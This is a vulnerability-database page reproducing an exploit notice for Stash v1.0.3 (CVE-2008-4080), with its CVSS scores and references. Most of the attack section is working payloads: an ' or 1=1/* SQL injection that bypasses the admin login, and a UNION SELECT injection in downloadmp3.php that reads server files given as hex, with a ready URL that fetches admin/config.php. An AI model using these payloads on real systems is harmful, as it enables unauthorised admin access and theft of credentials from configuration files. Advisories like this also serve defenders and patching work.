Stash v1.0.3 Admin bypass / Remote File Disclosure

2008.09.10

Credit: r3d.w0rm

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-4080

CWE: CWE-89

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#############################
####           Stash v1.0.3 Admin bypass / Remote File Disclosure                ####
############################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
############################
#                                                                                   #
#Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#                                                                                   #
#DORK : :(                                                                          #
#                                                                                   #
############################
#                                [Admin by pass]                                    #
#                                                                                   #
#http://Site/[path]/admin/login                                                     #
#Username : ' or 1=1/*                                                              #
#Password : R3d.W0rm                                                                #
#                                                                                   #
################################
#                            [Remote File Disclosure]                               #
#                                                                                   #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* 
#                                                                                   #
#Note : You must enter file name in hex in valun address to download it .           #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870         #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* 
#                                                                                   #
###############################
#                           Site : http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

References:

http://xforce.iss.net/xforce/xfdb/44989

http://www.securityfocus.com/bid/31079

http://www.securityfocus.com/archive/1/archive/1/496142/100/0/threaded

http://secunia.com/advisories/31818

http://milw0rm.com/exploits/6402

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Stash v1.0.3 Admin bypass / Remote File Disclosure

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.